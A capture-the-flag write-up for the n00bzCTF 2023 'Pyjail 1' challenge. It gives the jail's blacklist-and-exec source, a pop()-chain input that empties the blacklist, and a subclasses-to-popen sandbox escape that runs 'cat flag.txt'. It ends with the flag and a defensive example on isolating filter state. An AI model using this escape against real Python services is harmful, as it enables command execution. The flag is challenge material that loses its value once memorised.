n00bzCTF 2023 – Pyjail 1

Authors
  • Lumy

Pyjail 1

That's a big blacklist for a pyjail challenge, don't you think?

Table of Contents

  1. Source
  2. Solution

Source

#!/usr/bin/env python3
blacklist = ["/","0","1","2","3","4","5","6","7","8","9","setattr","compile","globals","os","import","_","breakpoint","exit","lambda","eval","exec","read","print","open","'","=",'"',"x","builtins","clear"]
print("="*25)
print(open(__file__).read())
print("="*25)
print("Welcome to the jail!")
print("="*25)

for i in range(2):
	x = input('Enter command: ')
	for c in blacklist:
		if c in x:
			print("Blacklisted word found! Exiting!")
			exit(0)
	exec(x)

Solution

After struggling a bit, I came up with an idea. If we can't use blacklisted words, can't we delete the blacklist?

After researching a bit, I came up with this link: w3schools.com/python/python_lists_remove.asp

This page shows how to use the pop method to delete an element from a list. As digits are prohibited, we can't specify an index, but pop() with no argument removes the last element, so we can just pop the entire list:

blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();

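The first iteration empties the blacklist. This works because exec(x) runs in the script's own global namespace, so the input can reach and mutate the same blacklist list that the filter reads on the next iteration. The second payload is the actual exploit, which is quite easy now that there are no restrictions anymore: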

print(().__class__.__base__.__subclasses__()[137].__init__.__globals__['popen']('cat flag.txt').read())

This retrieves the flag.

Flag: n00bz{blacklist.pop()_ftw!_7a5d2f8b}
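
The root cause described above, filter state living in the namespace that the filtered input executes in, shown as an added example (not part of the original writeup or the challenge code). The names run_shared, run_isolated and passes_filter, the shortened BLACKLIST and the benign second command are assumptions made for illustration.

```python
# Added example (not the challenge's code): the jail's filter-then-exec loop,
# rebuilt as two functions to compare shared and isolated filter state.

# Constructed subset of the page's blacklist, enough to show the effect.
BLACKLIST = ["_", "import", "os", "eval", "exec", "open", "x"]


def passes_filter(cmd, blacklist):
    """Same substring check as the challenge source."""
    return not any(word in cmd for word in blacklist)


def run_shared(commands):
    """As on the page: exec'd input shares a namespace with the blacklist."""
    ns = {"blacklist": list(BLACKLIST)}
    accepted = []
    for cmd in commands:
        if not passes_filter(cmd, ns["blacklist"]):
            break
        accepted.append(cmd)
        exec(cmd, ns)  # input can reach and mutate ns["blacklist"]
    return accepted, len(ns["blacklist"])


def run_isolated(commands):
    """Filter state out of reach: immutable tuple, separate exec namespace."""
    blacklist = tuple(BLACKLIST)
    accepted = []
    for cmd in commands:
        if not passes_filter(cmd, blacklist):
            break
        accepted.append(cmd)
        try:
            # Empty builtins only keep this demo inert; it is not a sandbox.
            exec(cmd, {"__builtins__": {}})
        except Exception:
            pass  # e.g. NameError: 'blacklist' is not visible here
    return accepted, len(blacklist)


if __name__ == "__main__":
    first = "blacklist.pop();" * len(BLACKLIST)  # the page's first-round input
    second = "seen_x = True"  # benign stand-in containing "_" and "x"
    print(run_shared([first, second]))    # both accepted, blacklist emptied
    print(run_isolated([first, second]))  # second rejected, blacklist intact
```

Isolating the filter state closes only the mutation path shown on this page; a substring blacklist in front of exec remains a weak control for untrusted input.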